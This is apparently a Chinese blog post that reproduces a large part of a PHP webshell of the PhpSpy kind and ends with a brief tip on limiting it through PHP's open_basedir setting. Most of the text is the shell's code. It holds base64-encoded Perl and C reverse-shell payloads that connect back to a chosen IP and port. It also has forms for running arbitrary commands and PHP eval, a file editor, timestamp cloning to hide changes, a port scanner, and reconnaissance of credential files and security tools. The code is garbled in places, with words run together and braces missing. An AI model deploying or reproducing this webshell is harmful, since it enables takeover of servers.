"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".

"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".

"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".

"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".

"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".

"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".

"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".

"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

if($p1 == 'start' && $p2 && $p3 && $p4){

if($p4 == 'perl') {

cf('/tmp/angel_bc',$back_connect);

$res= execute(which('perl')." /tmp/angel_bc ".$p2."".$p3." &");

}else {

cf('/tmp/angel_bc.c',$back_connect_c);

$res= execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');

@unlink('/tmp/angel_bc.c');

$res= execute("/tmp/angel_bc ".$p2." ".$p3." &");

}

m('Nowscript try connect to '.$p2.':'.$p3.' ...');

}

formhead(array('title'=>'BackConnect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);returnfalse;'));

p('<p>');

p('YourIP:');

makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));

p('YourPort:');

makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));

p('Use:');

makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));

makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));

p('</p>');

formfoot();

}//end

elseif ($act == 'portscan') {

!$p2&& $p2 = '127.0.0.1';

!$p3&& $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';

formhead(array('title'=>'端口扫描','onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);returnfalse;'));

p('<p>');

p('IP:');

makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));

p('Port:');

makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));

makeinput(array('value'=>'扫描','type'=>'submit','class'=>'bt'));

p('</p>');

formfoot();

if($p1 == 'start') {

p('<h2>Result»</h2>');

p('<ulclass="info">');

foreach(explode(',',$p3) as $port) {

$fp= @fsockopen($p2, $port, $errno, $errstr, 1);

if(!$fp) {

p('<li>'.$p2.':'.$port.'------------------------ <spanclass="b">Close</span></li>');

} else {

p('<li>'.$p2.':'.$port.'------------------------ <span class="redb">Open</span></li>');

@fclose($fp);

}

p('</ul>');

}

elseif ($act == 'eval') {

$phpcode= trim($p1);

if($phpcode){

if(!preg_match('#<\?#si', $phpcode)) {

$phpcode= "<?php\n\n{$phpcode}\n\n?>";

}

eval("?".">$phpcode<?");

}

formhead(array('title'=>'EvalPHP代码','onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));

maketext(array('title'=>'PHP代码','name'=>'p1', 'value'=>$phpcode));

p('<p><ahref="http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/"target="_blank">获得插件</a></p>');

formfooter();

}//end eval

elseif ($act == 'editfile') {

//编辑文件

if($p1 == 'edit' && $p2 && $p3) {

$fp= @fopen($p2,'w');

m('Savefile '.(@fwrite($fp,$p3) ? 'success' : 'failed'));

@fclose($fp);

}

$contents= '';

if(file_exists($p2)){

$fp=@fopen($p2,'r');

$contents=@fread($fp,filesize($p2));

@fclose($fp);

$contents=htmlspecialchars($contents);

}

formhead(array('title'=>'创建/编辑文件','onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);returnfalse;'));

makeinput(array('title'=>'文件名:','name'=>'p2','value'=>$p2,'newline'=>1));

maketext(array('title'=>'文件内容:','name'=>'p3','value'=>$contents));

formfooter();

goback();

}//end editfile

elseif ($act == 'newtime') {

$filemtime= @filemtime($p1);

formhead(array('title'=>'Clonefolder/file was last modified time','onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);returnfalse;'));

makeinput(array('title'=>'Alterfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));

makeinput(array('title'=>'Referencefolder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));

formfooter();

formhead(array('title'=>'Setlast modified','onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);returnfalse;'));

makeinput(array('title'=>'Currentfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));

makeinput(array('title'=>'Modifytime','name'=>'p3','value'=>date("Y-m-d H:i:s",$filemtime),'size'=>120,'newline'=>1));

formfooter();

goback();

}//end newtime

elseif ($act == 'shell') {

formhead(array('title'=>'执行命令', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));

p('<p>');

makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));

makeinput(array('class'=>'bt','type'=>'submit','value'=>'执行'));

p('</p>');

formfoot();

if($p1) {

p('<pre>'.execute($p1).'</pre>');

}

}//end shell

elseif ($act == 'phpenv') {

$d=array();

if(function_exists('mysql_get_client_info'))

$d[]= "MySql (".mysql_get_client_info().")";

if(function_exists('mssql_connect'))

$d[]= "MSSQL";

if(function_exists('pg_connect'))

$d[]= "PostgreSQL";

if(function_exists('oci_connect'))

$d[]= "Oracle";

$info= array(

1=> array('服务器时间',date('Y/m/d h:i:s',$timestamp)),

2=> array('服务器域名',$_SERVER['SERVER_NAME']),

3=> array('服务器IP',gethostbyname($_SERVER['SERVER_NAME'])),

4=> array('服务器系统',PHP_OS),

5=> array('服务器系统编码',$_SERVER['HTTP_ACCEPT_LANGUAGE']),

6=> array('服务器软件',$_SERVER['SERVER_SOFTWARE']),

7=> array('服务器网站端口',$_SERVER['SERVER_PORT']),

8=> array('PHP 运行方式',strtoupper(php_sapi_name())),

9=> array('文件路径',__FILE__),

10=> array('PHP 版本',PHP_VERSION),

11=> array('PHP信息',(IS_PHPINFO ? '<ahref="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),

12=> array('安全模式',getcfg('safe_mode')),

13=> array('管理员',(isset($_SERVER['SERVER_ADMIN']) ?$_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),

14=> array('允许url打开',getcfg('allow_url_fopen')),

15=> array('使用dl',getcfg('enable_dl')),

16=> array('显示错误',getcfg('display_errors')),

17=> array('注册全局变量',getcfg('register_globals')),

18=> array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),

19=> array('内存限制',getcfg('memory_limit')),

20=> array('post大小',getcfg('post_max_size')),

21=> array('上传文件大小',(getcfg('file_uploads') ?getcfg('upload_max_filesize') : 'Not allowed')),

22=> array('执行时间',getcfg('max_execution_time').'second(s)'),

23=> array('禁用功能',($dis_func ? $dis_func : 'No')),

24=> array('所支持的数据库',implode(', ', $d)),

25=> array('Curl支持',function_exists('curl_version') ?'Yes' : 'No'),

26=> array('Open base dir',getcfg('open_basedir')),

27=> array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),

28=> array('Safe mode include dir',getcfg('safe_mode_include_dir')),

);

$hp= array(0=> 'Server', 1=> 'PHP');

for($a=0;$a<2;$a++){

p('<h2>'.$hp[$a].'»</h2>');

p('<ulclass="info">');

if($a==0) {

for($i=1;$i<=9;$i++){

p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');

}

}elseif ($a == 1) {

for($i=10;$i<=25;$i++){

p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');

}

p('</ul>');

}

}//end phpenv

elseif ($act == 'secinfo') {

if(!IS_WIN ) {

$userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');

$danger= array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');

$downloaders= array('wget','fetch','lynx','links','curl','get','lwp-mirror');

secparam('Readable/etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');

secparam('Readable/etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');

secparam('OSversion', @file_get_contents('/proc/version'));

secparam('Distrname', @file_get_contents('/etc/issue.net'));

$safe_mode= @ini_get('safe_mode');

if(!$GLOBALS['safe_mode']){

$temp=array();

foreach($userful as $item)

if(which($item)){$temp[]=$item;}

secparam('Userful',implode(', ',$temp));

$temp=array();

foreach($danger as $item)

if(which($item)){$temp[]=$item;}

secparam('Danger',implode(', ',$temp));

$temp=array();

foreach($downloaders as $item)

if(which($item)){$temp[]=$item;}

secparam('Downloaders',implode(', ',$temp));

secparam('Hosts',@file_get_contents('/etc/hosts'));

secparam('HDDspace', execute('df -h'));

secparam('Mountoptions', @file_get_contents('/etc/fstab'));

}

}else {

secparam('OSVersion',execute('ver'));

secparam('AccountSettings',execute('net accounts'));

secparam('UserAccounts',execute('net user'));

secparam('IPConfigurate',execute('ipconfig -all'));

}

}//end

else {

m('未定义的行动');

}

</td></tr></table>

<divstyle="padding:10px;border-bottom:1px solid #fff;border-top:1px solid#ddd;background:#eee;">

<spanstyle="float:right;">

<?php

debuginfo();

ob_end_flush();

if(isset($DB)) {

echo'. '.$DB->querycount.' queries';

}

</span>

</div>

</body>

</html>

<?php

/*======================================================

函数库

======================================================*/

function secparam($n, $v) {

$v= trim($v);

if($v){

p('<h2>'.$n.'»</h2>');

p('<divclass="infolist">');

if(strpos($v,"\n") === false)

p($v.'<br/>');

else

p('<pre>'.$v.'</pre>');

p('</div>');

}

function m($msg) {

echo'<div style="margin:10px auto 15px auto;background:#ffffe0;border:1pxsolid#e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';

echo$msg;

echo'</div>';

}

function s_array($array) {

returnis_array($array) ? array_map('s_array', $array) : stripslashes($array);

}

function scookie($key, $value, $life = 0,$prefix = 1) {

global$timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;

$key= ($prefix ? $cookiepre : '').$key;

$life= $life ? $life : $cookielife;

$useport= $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;

setcookie($key,$value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);

}

function loginpage() {

formhead();

makehide('act','login');

makeinput(array('name'=>'password','type'=>'password','size'=>'20'));

makeinput(array('type'=>'submit','value'=>'登录'));

formfoot();

exit;

}

function execute($cfe) {

$res= '';

if($cfe) {

if(function_exists('system')){

@ob_start();

@system($cfe);

$res= @ob_get_contents();

@ob_end_clean();

}elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res= @ob_get_contents();

@ob_end_clean();

}elseif(function_exists('shell_exec')) {

$res= @shell_exec($cfe);

}elseif(function_exists('exec')) {

@exec($cfe,$res);

$res= join("\n",$res);

}elseif(@is_resource($f = @popen($cfe,"r"))) {

$res= '';

while(!@feof($f)){

$res.= @fread($f,1024);

}

@pclose($f);

}

return$res;

}

function which($pr) {

$path= execute("which $pr");

return($path ? $path : $pr);

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')){

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

function dirsize($cwd) {

$dh= @opendir($cwd);

$size= 0;

while($file= @readdir($dh)) {

if($file != '.' && $file != '..') {

$path= $cwd.'/'.$file;

$size+= @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path));

}

@closedir($dh);

return$size;

}

// 页面调试信息

function debuginfo() {

global$starttime;

$mtime= explode(' ', microtime());

$totaltime= number_format(($mtime[1] + $mtime[0] - $starttime), 6);

echo'Processed in '.$totaltime.' second(s)';

}

// 清除HTML代码

function html_clean($content) {

$content= htmlspecialchars($content);

$content= str_replace("\n", "<br />", $content);

$content= str_replace(" ","  ", $content);

$content= str_replace("\t","    ", $content);

return$content;

}

// 获取权限

function getChmod($file){

returnsubstr(base_convert(@fileperms($file),10,8),-4);

}

function PermsColor($f) {

if(!is_readable($f)) {

return'<span class="red">'.getPerms($f).'</span>';

}elseif (!is_writable($f)) {

return'<span class="black">'.getPerms($f).'</span>';

}else {

return'<span class="green">'.getPerms($f).'</span>';

}

function getPerms($file) {

$mode= @fileperms($file);

if(($mode & 0xC000) === 0xC000) {$type = 's';}

elseif(($mode & 0x4000) === 0x4000) {$type = 'd';}

elseif(($mode & 0xA000) === 0xA000) {$type = 'l';}

elseif(($mode & 0x8000) === 0x8000) {$type = '-';}

elseif(($mode & 0x6000) === 0x6000) {$type = 'b';}

elseif(($mode & 0x2000) === 0x2000) {$type = 'c';}

elseif(($mode & 0x1000) === 0x1000) {$type = 'p';}

else{$type = '?';}

$owner['read']= ($mode & 00400) ? 'r' : '-';

$owner['write']= ($mode & 00200) ? 'w' : '-';

$owner['execute']= ($mode & 00100) ? 'x' : '-';

$group['read']= ($mode & 00040) ? 'r' : '-';

$group['write']= ($mode & 00020) ? 'w' : '-';

$group['execute']= ($mode & 00010) ? 'x' : '-';

$world['read']= ($mode & 00004) ? 'r' : '-';

$world['write']= ($mode & 00002) ? 'w' : '-';

$world['execute']= ($mode & 00001) ? 'x' : '-';

if($mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}

if($mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}

if($mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}

return$type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];

}

function getUser($file) {

if(function_exists('posix_getpwuid')) {

$array= @posix_getpwuid(@fileowner($file));

if($array && is_array($array)) {

return' / <a href="#" title="User:'.$array['name'].'&#13&#10Passwd:'.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid:'.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir:'.$array['dir'].'&#13&#10Shell:'.$array['shell'].'">'.$array['name'].'</a>';

}

return'';

}

function copy_paste($c,$f,$d){

if(is_dir($c.$f)){

mkdir($d.$f);

$dirs= scandir($c.$f);

if($dirs) {

$dirs= array_diff($dirs, array('..', '.'));

foreach($dirs as $file) {

copy_paste($c.$f.'/',$file,$d.$f.'/');

}

}elseif(is_file($c.$f)) {

copy($c.$f,$d.$f);

}

// 删除目录

function deltree($deldir) {

$dirs= @scandir($deldir);

if($dirs) {

$dirs= array_diff($dirs, array('..', '.'));

foreach($dirs as $file) {

if((is_dir($deldir.'/'.$file))){

@chmod($deldir.'/'.$file,0777);

deltree($deldir.'/'.$file);

}else {

@chmod($deldir.'/'.$file,0777);

@unlink($deldir.'/'.$file);

}

@chmod($deldir,0777);

return@rmdir($deldir) ? 1 : 0;

}else {

return0;

}

// 表格行间的背景色替换

function bg() {

global$bgc;

return($bgc++%2==0) ? 'alt1' : 'alt2';

}

function cmp($a, $b) {

global$sort;

if(is_numeric($a[$sort[0]])){

return(($a[$sort[0]] < $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1);

}else {

returnstrcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1);

}

function getUpPath($cwd) {

$pathdb= explode('/', $cwd);

$num= count($pathdb);

if($num > 2) {

unset($pathdb[$num-1],$pathdb[$num-2]);

}

$uppath= implode('/', $pathdb).'/';

$uppath= str_replace('//', '/', $uppath);

return$uppath;

}

// 检查PHP配置参数

function getcfg($varname) {

$result= get_cfg_var($varname);

if($result == 0) {

return'No';

}elseif ($result == 1) {

return'Yes';

}else {

return$result;

}

// 获得文件扩展名

function getext($file) {

$info= pathinfo($file);

return$info['extension'];

}

function GetWDirList($path){

global$dirdata,$j,$web_cwd;

!$j&& $j=1;

$dirs= @scandir($path);

if($dirs) {

$dirs= array_diff($dirs, array('..','.'));

foreach($dirs as $file) {

$f=str_replace('//','/',$path.'/'.$file);

if(is_dir($f)){

if(is_writable($f)) {

$dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f);

$dirdata[$j]['mtime']=@date('Y-m-dH:i:s',filemtime($f));

$dirdata[$j]['chmod']=getChmod($f);

$dirdata[$j]['perm']=PermsColor($f);

$dirdata[$j]['owner']=getUser($f);

$dirdata[$j]['link']=$f;

$j++;

}

GetWDirList($f);

}

return$dirdata;

}else {

returnarray();

}

function sizecount($size) {

$unit= array('Bytes', 'KB', 'MB', 'GB', 'TB','PB');

for($i = 0; $size >= 1024 && $i < 5; $i++) {

$size/= 1024;

}

returnround($size, 2).' '.$unit[$i];

}

function p($str){

echo$str."\n";

}

function makehide($name,$value=''){

p("<inputid=\"$name\" type=\"hidden\" name=\"$name\"value=\"$value\" />");

}

function makeinput($arg = array()){

$arg['size']= isset($arg['size']) && $arg['size'] > 0 ?"size=\"$arg[size]\"" : "size=\"100\"";

$arg['type']= isset($arg['type']) ? $arg['type'] : 'text';

$arg['title']= isset($arg['title']) ? $arg['title'].'<br />' : '';

$arg['class']= isset($arg['class']) ? $arg['class'] : 'input';

$arg['name']= isset($arg['name']) ? $arg['name'] : '';

$arg['value']= isset($arg['value']) ? $arg['value'] : '';

if(isset($arg['newline'])) p('<p>');

p("$arg[title]<inputclass=\"$arg[class]\" name=\"$arg[name]\"id=\"$arg[name]\" value=\"$arg[value]\"type=\"$arg[type]\" $arg[size] />");

if(isset($arg['newline'])) p('</p>');

}

function makeselect($arg = array()){

$οnchange= isset($arg['onchange']) ? 'οnchange="'.$arg['onchange'].'"' : '';

$arg['title']= isset($arg['title']) ? $arg['title'] : '';

$arg['name']= isset($arg['name']) ? $arg['name'] : '';

p("$arg[title]<select class=\"input\" id=\"$arg[name]\"name=\"$arg[name]\" $onchange>");

if(is_array($arg['option'])) {

foreach($arg['option'] as $key=>$value) {

if($arg['selected']==$key) {

p("<optionvalue=\"$key\" selected>$value</option>");

}else {

p("<optionvalue=\"$key\">$value</option>");

}

p("</select>");

}

function formhead($arg = array()) {

!isset($arg['method'])&& $arg['method'] = 'post';

!isset($arg['name'])&& $arg['name'] = 'form1';

$arg['extra']= isset($arg['extra']) ? $arg['extra'] : '';

$arg['onsubmit']= isset($arg['onsubmit']) ? "οnsubmit=\"$arg[onsubmit]\"" :'';

p("<formname=\"$arg[name]\" id=\"$arg[name]\"action=\"".SELF."\" method=\"$arg[method]\"$arg[onsubmit] $arg[extra]>");

if(isset($arg['title'])) {

p('<h2>'.$arg['title'].'»</h2>');

}

function maketext($arg = array()){

$arg['title']= isset($arg['title']) ? $arg['title'].'<br />' : '';

$arg['name']= isset($arg['name']) ? $arg['name'] : '';

p("<p>$arg[title]<textareaclass=\"area\" id=\"$arg[name]\"name=\"$arg[name]\" cols=\"100\"rows=\"25\">$arg[value]</textarea></p>");

}

function formfooter($name = ''){

!$name&& $name = 'submit';

p('<p><inputclass="bt" name="'.$name.'" id="'.$name.'"type="submit" value="提交"></p>');

p('</form>');

}

function goback(){

global$cwd, $charset;

p('<formaction="'.SELF.'" method="post"><inputtype="hidden" name="act" value="file"/><input type="hidden" name="cwd"value="'.$cwd.'" /><input type="hidden"name="charset" value="'.$charset.'" /><p><inputclass="bt" type="submit" value="返回"></p></form>');

}

function formfoot(){

p('</form>');

}

function encode_pass($pass) {

$pass= md5($pass);

return$pass;

}

function pr($a) {

p('<divstyle="text-align: left;border:1px solid#ddd;"><pre>'.print_r($a).'</pre></div>');

}

class DB_MySQL {

var$querycount = 0;

var$link;

var$charsetdb = array();

var$charset = '';

functionconnect($dbhost, $dbuser, $dbpass, $dbname='') {

@ini_set('mysql.connect_timeout',5);

if(!$this->link= @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {

$this->halt('Cannot connect to MySQL server');

}

if($this->version()> '4.1') {

$this->setcharset($this->charset);

}

$dbname&& mysql_select_db($dbname, $this->link);

}

functionsetcharset($charset) {

if($charset && $this->charsetdb[$charset]) {

if(function_exists('mysql_set_charset')){

mysql_set_charset($this->charsetdb[$charset],$this->link);

}else {

$this->query("SETcharacter_set_connection='".$this->charsetdb[$charset]."',character_set_results='".$this->charsetdb[$charset]."',character_set_client=binary");

}

functionselect_db($dbname) {

returnmysql_select_db($dbname, $this->link);

}

functiongeterrdesc() {

return(($this->link) ? mysql_error($this->link) : mysql_error());

}

functiongeterrno() {

returnintval(($this->link) ? mysql_errno($this->link) : mysql_errno());

}

functionfetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM

returnmysql_fetch_array($query, $result_type);

}

functionquery($sql) {

//echo'<p style="color:#f00;">'.$sql.'</p>';

if(!($query= mysql_query($sql, $this->link))) {

$this->halt('MySQLQuery Error', $sql);

}

$this->querycount++;

return$query;

}

functionquery_res($sql) {

$res= '';

if(!$res= mysql_query($sql, $this->link)) {

$res= 0;

}else if(is_resource($res)) {

$res= 1;

}else {

$res= 2;

}

$this->querycount++;

return$res;

}

functionnum_rows($query) {

$query= mysql_num_rows($query);

return$query;

}

functionnum_fields($query) {

$query= mysql_num_fields($query);

return$query;

}

functionaffected_rows() {

returnmysql_affected_rows($this->link);

}

functionresult($query, $row) {

$query= mysql_result($query, $row);

return$query;

}

functionfree_result($query) {

$query= mysql_free_result($query);

return$query;

}

functionversion() {

returnmysql_get_server_info($this->link);

}

functionclose() {

returnmysql_close($this->link);

}

functionhalt($msg =''){

echo"<h2>".htmlspecialchars($msg)."</h2>\n";

echo"<p class=\"b\">Mysql error description:".htmlspecialchars($this->geterrdesc())."</p>\n";

echo"<p class=\"b\">Mysql error number:".$this->geterrno()."</p>\n";

exit;

}

functionget_fields_meta($result) {

$fields= array();

$num_fields= $this->num_fields($result);

for($i = 0; $i < $num_fields; $i++) {

$field= mysql_fetch_field($result, $i);

$fields[]= $field;

}

return$fields;

}

functionsqlAddSlashes($s = ''){

$s= str_replace('\\', '\\\\', $s);

$s= str_replace('\'', '\'\'', $s);

return$s;

}

//备份数据库

functionsqldump($table, $fp=0) {

$crlf= (IS_WIN ? "\r\n" : "\n");

$search= array("\x00", "\x0a", "\x0d","\x1a"); //\x08\\x09, not required

$replace= array('\0', '\n', '\r', '\Z');

if(isset($this->charset) &&isset($this->charsetdb[$this->charset])) {

$set_names= $this->charsetdb[$this->charset];

}else {

$set_names= $this->charsetdb['utf-8'];

}

$tabledump= 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;

$tabledump.= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf

. '/*!40101 SET@OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf

. '/*!40101 SET@OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf

. '/*!40101 SET NAMES ' . $set_names . '*/;'.$crlf.$crlf;

$tabledump.= "DROP TABLE IF EXISTS `$table`;".$crlf;

$res= $this->query("SHOW CREATE TABLE $table");

$create= $this->fetch($res, MYSQL_NUM);

$tabledump.= $create[1].';'.$crlf.$crlf;

if(strpos($tabledump, "(\r\n ")) {

$tabledump= str_replace("\r\n", $crlf, $tabledump);

}elseif (strpos($tabledump, "(\n ")) {

$tabledump= str_replace("\n", $crlf, $tabledump);

}elseif (strpos($tabledump, "(\r ")) {

$tabledump= str_replace("\r", $crlf, $tabledump);

}

unset($create);

if($fp) {

fwrite($fp,$tabledump);

}else {

echo$tabledump;

}

$tabledump= '';

$rows= $this->query("SELECT * FROM $table");

$fields_cnt= $this->num_fields($rows);

$fields_meta= $this->get_fields_meta($rows);

while($row = $this->fetch($rows, MYSQL_NUM)) {

for($j = 0; $j < $fields_cnt; $j++) {

if(!isset($row[$j]) || is_null($row[$j])) {

$values[]= 'NULL';

}elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type !='timestamp' && !$fields_meta[$j]->blob) {

$values[]= $row[$j];

}elseif ($fields_meta[$j]->blob) {

if(empty($row[$j]) && $row[$j] != '0') {

$values[]= '\'\'';

}else {

$values[]= '0x'.bin2hex($row[$j]);

}

}else {

$values[]= '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\'';

}

$tabledump= 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;

unset($values);

if($fp) {

fwrite($fp,$tabledump);

}else {

echo$tabledump;

}

$this->free_result($rows);

}

将上面的PHP文件挂到web下面，输入密码（密码在PHP的配置文件中已经写好），就可以进入到web目录下面去了。

如此发现可以进行跨站的操作了。

如果我们想禁止这些操作，将用户的操作目录限制在某个下面，可以在PHP的配置文件中实现此操作

[HOST=www.abc.com]

open_basedir=/path/for/web:/var/lib/php/session(php的session目录):/tmp

[PATH=/path/for/web]

open_basedir=/path/for/web:/var/lib/php/session:/tmp

限制的目录可以是多个，多个目录之间利用冒号进行分隔开，之后重启PHP可以了。重新访问挂的木马文件，发现此时不能再向上级目录进行访问了，也就是我们的操作被所在了opendir的目录下面了。

xuejinliang

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录